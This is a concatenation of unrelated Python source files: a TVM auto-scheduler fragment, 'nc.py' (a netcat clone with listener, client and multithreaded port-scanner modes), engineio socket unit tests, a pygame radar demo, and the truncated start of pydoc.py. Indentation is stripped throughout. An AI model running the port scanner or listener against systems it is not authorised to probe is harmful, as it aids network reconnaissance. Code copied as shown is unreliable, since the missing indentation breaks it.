for t in outs:
traverse(t)
io_tensors = inputs + list(outs)
for tensor in io_tensors:
# Reject the compute if any of its I/O tensors has dynamic shape.
if any([not isinstance(v, int) for v in get_const_tuple(tensor.shape)]):
return ([], False, False)
return (io_tensors, len(layout_free_ops) > 0, has_complex_op)
@tvm._ffi.register_func("auto_scheduler.relay_integration.auto_schedule_topi_compute")
def auto_schedule_topi(func_name, outs):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
func_name: str
The name of the function being scheduled.
outs: List[Tensor]
The output tensors of topi compute functions
Returns
-------
sch: Optional[te.Schedule]
A tuned schedule or none (if not tuned) in the final build mode;
None in the tracing mode so that the fallback topi schedule will be used.
"""
# pylint: disable=import-outside-toplevel
from tvm.auto_scheduler.measure import (
prepare_input_map,
) # lazily import to avoid recursive dependency
io_tensors, has_layout_free, has_complex_op = traverse_to_get_io_tensors(outs)
if not io_tensors: # The compute includes dynamic shapes which are not supported yet.
return None
try:
dag = ComputeDAG(io_tensors)
except tvm.error.TVMError as err:
logger.info("Failed to create a ComputeDAG for auto_scheduler: %s", str(err))
return None
key = register_workload_tensors(dag.workload_key(), io_tensors)
target = tvm.target.Target.current()
dispatch_ctx = DispatchContext.current
state = dispatch_ctx.query(target, key, has_complex_op, dag, func_name)
schedule = None
env = TracingEnvironment.current
if env is None:
# in the final build mode
if state is None:
return None
schedule, _ = dag.apply_steps_from_state(state)
return schedule
if env.tracing_mode in [TracingMode.EXTRACT_TASK, TracingMode.EXTRACT_COMPLEX_TASK_ONLY]:
# in the task extraction mode
if has_complex_op or env.tracing_mode == TracingMode.EXTRACT_TASK:
env.add_workload_key(func_name, key)
input_map = prepare_input_map(io_tensors)
if input_map:
env.add_workload_input_names(key, list(input_map.values()))
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# in prepare_layout_rewrite mode
if (
LayoutRewriteOption.get_target_default(target, True) != LayoutRewriteOption.NO_REWRITE
and has_layout_free
):
if state is None:
return None
# rewrite the layout and update the context for the new dag
new_dag = dag.rewrite_layout_from_state(state)
new_key = new_dag.workload_key()
if new_key != key:
dispatch_ctx.update(target, new_key, state)
else:
raise ValueError("Invalid tracing mode: " + env.tracing_mode)
return schedule
@tvm._ffi.register_func("auto_scheduler.relay_integration.te_compiler_update_weights")
def te_compiler_update_weights(function_weights):
"""A callback for updating the weights of extracted tasks. When using the TE compiler
that avoids compiling the same function multiple times by caching, all extracted tasks
have weight 1, so the TE compiler invokes this callback at the end. In this case,
we override existing weights with the use_count in TE compiler cache.
Parameters
----------
function_weights: Dict[str, int]
Mapping from function names to their weights.
"""
env = TracingEnvironment.current
if env is not None:
# Override this map with the weights in the TE compiler.
env.wkl_key_to_weight = {}
for func_name, weight in function_weights.items():
# If the function name is not in the map, then it means we are not interested in
# this function during task extraction (e.g., a function without reduction).
if func_name not in env.func_name_to_wkl_key:
continue
workload_key = env.func_name_to_wkl_key[func_name]
if workload_key not in env.wkl_key_to_weight:
env.wkl_key_to_weight[workload_key] = (0, set())
# Note that the function appears multiple times in a model will be renamed
# to make sure function names are unique, so we use the workload key generated
# from the function's TE compute to determine their weights.
old_weight, func_names = env.wkl_key_to_weight[workload_key]
func_names.add(func_name)
env.wkl_key_to_weight[workload_key] = (old_weight + weight, func_names)
def tensor_no_check_call(self, *indices):
"""An indexing function without any check.
This is the same as `tvm.te.Tensor::__call__` except that the safety
check is removed.
"""
indices = convert_to_object(indices)
args = []
for x in indices:
if isinstance(x, _expr.PrimExpr):
args.append(x)
elif isinstance(x, _expr.IterVar):
args.append(x.var)
else:
raise ValueError("The indices must be expression")
return _expr.ProducerLoad(self, args)
def remove_index_check(tensor):
"""Remove the safety check in the indexing function for a tensor.
This is done by monkey patching its indexing function.
After removing the check, we are allowed to create a
temporary wrong IR and fix it later in other places.
Parameters
----------
tensor: Tensor
The tensor to remove index check.
"""
# Monkey patch the indexing function
tensor.__call__ = tensor_no_check_call.__get__(tensor, Tensor)
def rewrite_compute_body(compute_tensor, new_layout):
"""Rewrite the body of a ComputeOp according to a new layout of a placeholder"""
op = compute_tensor.op
# Get layout free placeholders
layout_free_placeholders = op.attrs["layout_free_placeholders"]
assert len(layout_free_placeholders) == 1, "Only support one layout free placeholder"
placeholder_op = layout_free_placeholders[0].op
# Rewrite the index expression in body
body = []
for b in op.body:
body.append(_ffi_api.RewriteIndexForNewLayout(placeholder_op, new_layout, b))
op_node = tvm.te._ffi_api.ComputeOp(op.name, op.tag, op.attrs, op.axis, body)
num = op_node.num_outputs
outputs = tuple(op_node.output(i) for i in range(num))
return outputs[0] if num == 1 else outputs
def is_auto_scheduler_enabled():
"""Return whether the auto-scheduler is enabled.
Parameters
----------
enabled: bool
Whether the auto-scheduler is enabled
"""
return PassContext.current().config.get("relay.backend.use_auto_scheduler", False)
|
nc.py
|
from socket import AF_INET6, AF_INET, SOCK_STREAM, SOCK_DGRAM, socket
from argparse import ArgumentParser
from logging import basicConfig, info, INFO, CRITICAL
from threading import Thread
## Options for implement
## Tunnel
# -P tunneling port
# -S tunneling address
# Recieve function (recieve any size buffer)
def recv(client):
buffer = b''
while True:
data = client.recv(1024)
if len(data) < 1024:
return buffer + data
buffer += data
# Check who start sendind data
def checkTheyFirstSend(client, timeout):
client.settimeout(5)
try:
data = recv(client)
client.settimeout(timeout)
return data
except:
client.settimeout(timeout)
return False
# Handler for the connection tunnel
class TunnelHandler:
pass
# Handler for the scanner
class ScannerHandler:
def __init__(self):
# Family of all teh socket taht are oging to be created
self.__family = None
# protocol of all the sockets that are going to be created
self.__protocol = None
# Host
self.__address = None
# Ports as iter
self.__ports = None
# Results of the scan
self.__active_ports = []
# Useful for multi threading scan
self.__active_connections = 0
# Get reference information for the creation of each socket thread
def setSocket(self, s: socket):
# Get the socket family
self.__family = s.family
# Get the socket protocol
self.__protocol = s.type
# Close the socket because we only need from it the family and protocol
s.close()
def setAddress(self, address: str):
self.__address = address
def setPort(self, *ports):
self.__ports = ports
# Start the scanner
def start(self):
for port in self.__ports:
while self.__active_connections >= 100:
pass
Thread(target=self.connectionHandler, args=[socket(self.__family, self.__protocol), port]).start()
while self.__active_connections > 0:
pass
def connectionHandler(self, s, target_port):
self.__active_connections += 1
try:
s.connect((self.__address, target_port))
self.__active_ports.append(target_port)
info(f'OPEN PORT {target_port}')
except:
pass
s.close()
del s
self.__active_connections -= 1
# Here we set in easy handling mode the options
class ConfigurationHandler:
def __init__(self):
self.__host = ''
self.__ports = None
# Family of the socket
self.__family = None
# Protocol of the socket
self.__protocol = None
# Time out of the socket
self.__timeout = None
self.__mode = 'Client' # Client by default
## Modular options
# Set port with -p option
def setports(self, ports):
if len(ports):
self.setPorts(ports)
# Set address (host) with -s option
def sethost(self, host):
if len(host): # Do not collapse with setHost option
self.setHost(host)
# Set host
def setHost(self, host: str):
if len(host):
self.__host = host
# Set the family of the socket
def setFamily(self, family):
self.__family = family
# Set protocol of the socket: SOCK_STREAM, SOCK_DGRAM
def setProtocol(self, protocol):
self.__protocol = protocol
# Set Timeout of the socket
def setTimeout(self, timeout: float):
self.__timeout = timeout
# Set the veborse mode to print anything or print only errors
def setVerbose(self, value: bool):
if value:
basicConfig(level=INFO, format='%(message)s')
else:
basicConfig(level=CRITICAL, format='%(message)s')
# Set the mode to listen
def setModeListen(self, value: bool):
if value:
self.__mode = 'Listen'
# Set mode to scan
def setModeScan(self, value: bool):
if value:
self.__mode = 'Scan'
# Port setup
def setPorts(self, ports):
if len(ports):
ports = ports.split(',')
buffer = []
for port in ports:
if '-' in port:
splited_port = port.split('-')
buffer += list(range(int(splited_port[0]), int(splited_port[1]) + 1))
else:
if port.isnumeric():
buffer.append(int(port))
self.__ports = buffer
## Function that return processed data
# Create the socket and return it
def getSocket(self):
s = socket(self.__family, self.__protocol)
s.settimeout(self.__timeout)
return s
# return the mode of the session
def getMode(self):
return self.__mode
# Return the address (host)
def getHost(self):
return self.__host
# Return the port or the ports to be used by the handler
def getPorts(self):
return self.__ports
# Handler for socket as client and the tunnel
class ClientHandler:
def __init__(self):
# Socket for the server
self.__socket = None
self.__address = None
self.__port = None
def setSocket(self, s: socket):
self.__socket = s
def setAddress(self, address: str):
self.__address = address
def setPort(self, port):
self.__port = port
def start(self):
self.__socket.connect((self.__address, self.__port))
self.connectionHandler()
def connectionHandler(self):
while True:
# Check if we start sending
welcome = checkTheyFirstSend(self.__socket, self.__socket.gettimeout())
if welcome:
info(welcome.decode('utf-8'))
while True:
input_buffer = input().encode('utf-8')
self.__socket.sendall(input_buffer)
response = recv(self.__socket)
try:
info(response.decode('utf-8'))
except:
# Some kind of check to not print a file content
if len(response) < 10000:
info(str(response))
# Handler for the listener
class ServerHandler:
def __init__(self):
# Socket for the server
self.__socket = None
self.__address = None
self.__port = None
def setSocket(self, s: socket):
self.__socket = s
# Set address (host) for the socket
def setAddress(self, address: str):
self.__address = address
# Set the port of the connection
def setPort(self, port):
self.__port = port
# Enable server mode
def start(self):
self.__socket.bind((self.__address, self.__port))
self.__socket.listen(1)
try:
self.connectionHandler()
except Exception as e:
info(str(e))
# Handler for the server session
def connectionHandler(self):
client, address = self.__socket.accept()
welcome = checkTheyFirstSend(client, self.__socket.gettimeout())
if welcome:
info(welcome.decode('utf-8'))
while True:
input_buffer = input().encode('utf-8')
client.sendall(input_buffer)
response = recv(client)
# Try to decode and print the response
try:
info(response.decode('utf-8'))
except:
# Some kind of check to not print a file content
if len(response) < 10000:
info(str(response))
def main(args=None):
# Modes and its classes
modes = {'Listen': ServerHandler, 'Client': ClientHandler, 'Scan': ScannerHandler}
if not args:
parser = ArgumentParser()
parser.add_argument('setHost', help='Set target host', nargs='?', default='') # Implemented
# Port or ports for the connection or scanner
parser.add_argument('setPorts',
help='Port[s] to be used (when is scan mode; you can set ranges like 10-50 and multi values are comma "," separated)',
nargs='?', default='')
# Set address family
parser.add_argument('-6', help='Set address family to IPV6', dest='setFamily', action='store_const',
const=AF_INET6, default=AF_INET) # Implemented
# Set address protocol
parser.add_argument('-u', help='Set address protocol to UDP', dest='setProtocol', action='store_const',
const=SOCK_DGRAM, default=SOCK_STREAM) # Implemented
# Server mode
parser.add_argument('-l', '--listen', help='Listen for incoming connections', dest='setModeListen',
action='store_const', const=True, default=False) # Implemented
# Verbose mode
parser.add_argument('-v', '--verbose', help='Verbose mode', dest='setVerbose', action='store_const', const=True,
default=False) # Implemented
# Timeout limit for connections
parser.add_argument('-w', '--wait', help='Connection timeout', dest='setTimeout', default=3600,
type=float) # Implemented
# Set port[s] with an option
parser.add_argument('-p', '--port', dest='setports', help='Set the port or ports to be processed',
default='') # Implemented
# Set address (host) with an option
parser.add_argument('-s', '--address', dest='sethost', help='Set host to be processed with an option',
default='')
# Enable scanner mode
parser.add_argument('-z', '--scan', dest='setModeScan', help='Set mode to scan', action='store_const',
const=True, default=False)
args = vars(parser.parse_args())
c = ConfigurationHandler()
for key in args:
getattr(c, key)(args[key])
s = c.getSocket()
mode = c.getMode()
host = c.getHost()
# Select one of the handlers; corresponding to the user options
handler = modes[mode]()
# Set the host target to the handler
handler.setAddress(host)
# Set the socket to be used by the handler
handler.setSocket(s)
handler.setPort(*c.getPorts())
handler.start()
try:
if __name__ == '__main__':
main()
except Exception as e:
print(e)
|
test_socket.py
|
import time
import unittest
import six
if six.PY3:
from unittest import mock
else:
import mock
from engineio import packet
from engineio import payload
from engineio import socket
class TestSocket(unittest.TestCase):
def _get_mock_server(self):
mock_server = mock.Mock()
mock_server.ping_timeout = 0.1
mock_server.ping_interval = 0.1
try:
import queue
except ImportError:
import Queue as queue
import threading
mock_server.async = mock.Mock()
mock_server.async.Queue = queue.Queue
mock_server.async.QueueEmpty = queue.Empty
mock_server.async.thread = lambda t: threading.Thread(target=t)
mock_server.async.has_websocket = False
return mock_server
def test_create(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertEqual(s.server, mock_server)
self.assertEqual(s.sid, 'sid')
self.assertFalse(s.upgraded)
self.assertFalse(s.closed)
self.assertTrue(hasattr(s.queue, 'get'))
self.assertTrue(hasattr(s.queue, 'put'))
self.assertTrue(hasattr(s.queue, 'task_done'))
self.assertTrue(hasattr(s.queue, 'join'))
def test_empty_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(IOError, s.poll)
def test_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
self.assertEqual(s.poll(), [pkt1, pkt2])
def test_ping_pong(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.PING, data='abc'))
r = s.poll()
self.assertEqual(len(r), 1)
self.assertTrue(r[0].encode(), b'3abc')
def test_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(ValueError, s.receive, packet.Packet(packet.OPEN))
def test_timeout(self):
mock_server = self._get_mock_server()
mock_server.ping_interval = -0.1
s = socket.Socket(mock_server, 'sid')
s.last_ping = time.time() - 1
s.close = mock.MagicMock()
s.send('packet')
s.close.assert_called_once_with(wait=False, abort=True)
def test_polling_read(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
packets = s.handle_get_request(environ, start_response)
self.assertEqual(packets, [pkt1, pkt2])
def test_polling_read_error(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
self.assertRaises(IOError, s.handle_get_request, environ,
start_response)
def test_polling_write(self):
mock_server = self._get_mock_server()
mock_server.max_http_buffer_size = 1000
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
s.handle_post_request(environ)
self.assertEqual(s.receive.call_count, 2)
def test_polling_write_too_large(self):
mock_server = self._get_mock_server()
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
mock_server.max_http_buffer_size = len(p) - 1
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
self.assertRaises(ValueError, s.handle_post_request, environ)
def test_upgrade_handshake(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
s._upgrade_websocket = mock.MagicMock()
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo',
'HTTP_CONNECTION': 'Foo,Upgrade,Bar',
'HTTP_UPGRADE': 'websocket'}
start_response = mock.MagicMock()
s.handle_get_request(environ, start_response)
s._upgrade_websocket.assert_called_once_with(environ, start_response)
def test_upgrade(self):
mock_server = self._get_mock_server()
mock_server.async.has_websocket = True
mock_server.async.wrap_websocket = mock.MagicMock()
mock_ws = mock.MagicMock()
mock_server.async.wrap_websocket.configure_mock(
return_value=mock_ws)
s = socket.Socket(mock_server, 'sid')
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server.async.wrap_websocket.assert_called_once_with(
s._websocket_handler)
mock_ws.assert_called_once_with(environ, start_response)
def test_upgrade_twice(self):
mock_server = self._get_mock_server()
mock_server.async.has_websocket = True
mock_server.async.wrap_websocket = mock.MagicMock()
s = socket.Socket(mock_server, 'sid')
s.upgraded = True
environ = "foo"
start_response = "bar"
self.assertRaises(IOError, s._upgrade_websocket,
environ, start_response)
def test_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.UPGRADE))
r = s.poll()
self.assertEqual(len(r), 1)
self.assertTrue(r[0].encode(), b'6')
def test_upgrade_no_probe(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
ws = mock.MagicMock()
ws.wait.return_value = packet.Packet(packet.NOOP).encode(
always_bytes=False)
s._websocket_handler(ws)
self.assertFalse(s.upgraded)
def test_upgrade_no_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
ws = mock.MagicMock()
probe = six.text_type('probe')
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.NOOP).encode(always_bytes=False)]
s._websocket_handler(ws)
ws.send.assert_called_once_with(packet.Packet(
packet.PONG, data=probe).encode(always_bytes=False))
self.assertEqual(s.queue.get().packet_type, packet.NOOP)
self.assertFalse(s.upgraded)
def test_websocket_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
time.sleep(0)
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', 'foo'),
mock.call('disconnect', 'sid')])
ws.send.assert_called_with('4bar')
def test_websocket_read_write_fail(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
RuntimeError]
ws.send.side_effect = [None, RuntimeError]
s._websocket_handler(ws)
time.sleep(0)
self.assertEqual(s.closed, True)
def test_websocket_ignore_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.OPEN).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
time.sleep(0)
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', foo),
mock.call('disconnect', 'sid')])
ws.send.assert_called_with('4bar')
def test_send_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
self.assertRaises(IOError, s.send, packet.Packet(packet.NOOP))
def test_close_and_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=True)
s.queue.join.assert_called_once_with()
def test_close_without_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=False)
self.assertEqual(s.queue.join.call_count, 0)
|
radar.py
|
"""
Martin O'Hanlon
www.stuffaboutcode.com
Pygame radar
Attribution:
Some radar code - http://simpson.edu/computer-science/
Circle on line equation - http://codereview.stackexchange.com/questions/86421/line-segment-to-circle-collision-algorithm
"""
import pygame
import math
import threading
BLACK = (0, 0, 0)
GREEN = (0, 255, 0)
class Radar(threading.Thread):
def __init__(self, screen, radar_rect, radar_pos = (0, 0), scale = 1,
back_col = BLACK, radar_col = GREEN):
#setup threading
threading.Thread.__init__(self)
self.screen = screen
self.radar_rect = radar_rect
self.centre = (radar_rect[0] + (radar_rect[2] / 2),
radar_rect[1] + (radar_rect[3] / 2))
self.sweeplen = (radar_rect[2] / 2)
self.radar_pos = radar_pos
self.scale = scale
self.back_col = back_col
self.radar_col = radar_col
self.running = False
self.stopped = True
self.dots = {}
def run(self):
self.running = True
self.stopped = False
angle = 0
#TODO - set the back of the radar to the back colour
while not self.stopped:
# Calculate the x,y for the end point of our 'sweep' based on the current angle
x = self.centre[0] + math.sin(angle) * self.sweeplen
y = self.centre[1] + math.cos(angle) * self.sweeplen
# Draw the line from the center at 145, 145 to the calculated end spot
pygame.draw.line(self.screen, self.radar_col, [self.centre[0], self.centre[1]], [x, y], 2)
self._display_dots_on_line(self.centre[0], self.centre[1], x, y)
# Draw the outline of a circle to 'sweep' the line around
pygame.draw.ellipse(self.screen, self.radar_col, self.radar_rect, 2)
#update the display, wait for the next frame
pygame.display.update()
pygame.time.Clock().tick(60)
#redraw the line in black to clear it
pygame.draw.line(self.screen, self.back_col, [self.centre[0], self.centre[1]], [x, y], 2)
# Increase the angle by 0.03 radians
angle = angle + .03
# If we have done a full sweep, reset the angle to 0
if angle > 2 * math.pi:
angle = angle - 2 * math.pi
self.running = False
def stop(self):
self.stopped = True
#stop the dots
for key, dot in self.dots.items():
dot.stop()
#wait till its stopped
while(self.running):
pygame.time.wait(10)
def dot_add(self, dot_id, x, y, data = None, back_col = None, dot_col = None):
if back_col == None: back_col = self.back_col
if dot_col == None: dot_col = self.radar_col
#work out x, y on screen
screen_x, screen_y = self._calc_screen_x_y(x, y)
#does the dot already exist?
if dot_id in self.dots:
dot = self.dots[dot_id]
dot.move(screen_x, screen_y)
else:
dot = RadarDot(self.screen, screen_x, screen_y, 10, data = data, back_col = back_col, dot_col = dot_col)
self.dots[dot_id] = dot
def dot_remove(self, dot_id):
if dot_id in self.dots:
del self.dots[dot_id]
def dot_move(self, dot_id, x, y):
screen_x, screen_y = self._calc_screen_x_y(x, y)
self.dots[dot_id].move(screen_x, screen_y)
def dot_move_by(self, dot_id, x, y):
self.dots[dot_id].move_by(x, y)
def _calc_screen_x_y(self, x, y):
diff_x = (x - self.radar_pos[0]) * self.scale
diff_y = (y - self.radar_pos[1]) * self.scale
screen_x = int(round(self.centre[0] + diff_x, 0))
screen_y = int(round(self.centre[1] + diff_y, 0))
return screen_x, screen_y
def _display_dots_on_line(self, x1, y1, x2, y2):
for key, dot in self.dots.copy().items():
if dot.fade_step == 0 or dot.fade_step > 50:
intersect, pos = dot.on_line(x1, y1, x2, y2)
if intersect == True:
dot.show()
def dot_at_point(self, point):
dot_found = None
for key, dot in self.dots.copy().items():
if dot.rect.collidepoint(point):
dot_found = key
return dot_found
def set_scale(self, new_scale):
self.scale = new_scale
for key, dot in self.dots.copy().items():
self.dot_move(key, dot.x, dot.y)
class RadarDot():
def __init__(self, screen, x, y, radius,
back_col = BLACK, dot_col = GREEN,
fade_time = 4000, no_of_fade_steps = 100, data = None):
self.screen = screen
self.radius = radius
self.move(x, y)
self.back_col = back_col
self.dot_col = dot_col
self.fade_time = fade_time
self.no_of_fade_steps = no_of_fade_steps
self.fade_step = 0
self.fade_running = False
self.data = data
def show(self):
#if the fade is running
if self.fade_running:
#reset the fade
self.fade_step = 0
else:
#start the fade again
self.fade_thread = threading.Thread(target = self._fade)
self.fade_thread.start()
def _fade(self):
#calc fade steps
fade_steps = self._calc_fade(self.dot_col, self.back_col, self.no_of_fade_steps)
fade_delay = int(self.fade_time / self.no_of_fade_steps)
#keep fading out the dot until it disappears or its stopped
now = pygame.time.get_ticks()
self.fade_step = 0
self.fade_running = True
#keep fading the dot until its the back col or its stopped
while self.fade_step < (len(fade_steps) - 1) and self.fade_running == True:
#where am i drawing the dot this time?
lastx, lasty = self.x, self.y
pygame.draw.ellipse(self.screen,
fade_steps[self.fade_step],
(lastx - self.radius, lasty - self.radius, self.radius, self.radius), 0)
#pygame.display.update()
#wait until the next time or the fade is stopped
till = now + fade_delay
while till > pygame.time.get_ticks() and self.fade_running == True:
pygame.time.wait(10)
now = till
#draw over the last ellipse in black
pygame.draw.ellipse(self.screen,
self.back_col,
(lastx - self.radius, lasty - self.radius, self.radius, self.radius), 0)
self.fade_step += 1
self.fade_running = False
#pygame.display.update()
def move(self, x, y):
self.x = x
self.y = y
self.rect = pygame.Rect(self.x - self.radius, self.y - self.radius, self.radius, self.radius)
def move_by(self, x, y):
self.move(self.x + x, self.y + y)
def _calc_fade(self, start_rgb, end_rgb, steps):
#work out the number of colours and steps
r_step = (end_rgb[0] - start_rgb[0]) / steps
g_step = (end_rgb[1] - start_rgb[1]) / steps
b_step = (end_rgb[2] - start_rgb[2]) / steps
rgb_steps = []
rgb_steps.append(start_rgb)
for step in range(1, steps):
last_rgb = rgb_steps[step - 1]
this_rgb = (last_rgb[0] + r_step,
last_rgb[1] + g_step,
last_rgb[2] + b_step)
rgb_steps.append(this_rgb)
rgb_steps.append(end_rgb)
return rgb_steps
def stop(self):
#if the fade is running, stop it
if self.fade_running:
self.fade_running = False
self.fade_thread.join()
def on_line(self, x1, y1, x2, y2):
Q = pygame.math.Vector2(self.x, self.y)
r = self.radius
P1 = pygame.math.Vector2(x1, y1)
V = pygame.math.Vector2(x2, y2) - P1
a = V.dot(V)
b = 2 * V.dot(P1 - Q)
c = P1.dot(P1) + Q.dot(Q) - 2 * P1.dot(Q) - r**2
disc = b**2 - 4 * a * c
if disc < 0:
return False, None
sqrt_disc = math.sqrt(disc)
t1 = (-b + sqrt_disc) / (2 * a)
t2 = (-b - sqrt_disc) / (2 * a)
if not (0 <= t1 <= 1 or 0 <= t2 <= 1):
return False, None
t = max(0, min(1, - b / (2 * a)))
return True, P1 + t * V
if __name__ == "__main__":
pygame.init()
# Set the height and width of the screen
SIZE = [600, 600]
BORDER = 10
#create the screen
screen = pygame.display.set_mode(SIZE)
# Set the screen background
screen.fill(BLACK)
# Dimensions and location of radar sweep
radar_rect = [BORDER, BORDER, SIZE[0] - (BORDER * 2), SIZE[1] - (BORDER * 2)]
radar = Radar(screen, radar_rect)
radar.start()
radar.dot_add(1, -200, -200)
radar.dot_add(2, 200, 200)
radar.dot_add(3, -200, 250)
# Loop until the user clicks the close button.
done = False
while not done:
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
pygame.time.wait(75)
radar.dot_move_by(1, 1, 1.5)
radar.dot_move_by(2, -1.4, -1)
radar.dot_move_by(3, 0, -1.5)
radar.stop()
pygame.quit()
|
pydoc.py
|
#! /usr/bin/python3.2
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on the given port on the
local machine. Port number 0 can be used to get an arbitrary unused port.
Run "pydoc -b" to start an HTTP server on an arbitrary unused port and
open a Web browser to interactively browse documentation. The -p option
can be used with the -b option to explicitly specify the server port.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it. This option is
deprecated, since the server can now be controlled directly from HTTP
clients.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
/usr/share/doc/pythonX.Y/html/library
if the pythonX.Y-doc package is installed or in
http://docs.python.org/X.Y/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__all__ = ['help']
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision$"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import builtins
import imp
import inspect
import io
import os
import pkgutil
import platform
import re
import sys
import time
import tokenize
import warnings
from collections import deque
from reprlib import Repr
from traceback import extract_tb, format_exception_only
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
